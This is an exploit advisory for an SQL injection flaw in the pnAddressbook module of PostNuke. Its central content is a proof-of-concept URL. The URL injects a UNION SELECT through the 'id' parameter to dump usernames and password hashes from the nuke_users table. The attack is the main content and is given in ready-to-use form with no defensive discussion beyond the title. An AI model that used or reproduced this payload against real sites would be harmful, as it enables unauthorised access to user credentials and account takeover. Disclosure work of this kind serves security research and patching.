# Exploit Title: PostNuke Module pnAddressbook SQL Injection Vulnerability
# Date: 1/18/2012
# Author: Robert Cooper ( Robert.Cooper [at] areyousecure.net )
# Tested on: [Linux/Windows 7]

#Vulnerable parameter:

id=

 
##############################################################
PoC:
 
http://www.example.com/index.php?module=pnAddressBook&func=viewDetail&formcall=edit&authid=2a630bd4b1cc5e7d03ef3ab28fb5e838&catview=0&sortview=0&formSearch=&all=1&menuprivate=0&total=78&page=1&char=&id=-46 union all select 1,2,3,group_concat(pn_uname,0x3a,pn_pass) FROM nuke_users--
 
##############################################################

www.areyousecure.net

www.websiteauditing.org

 
# Shouts to the Belegit crew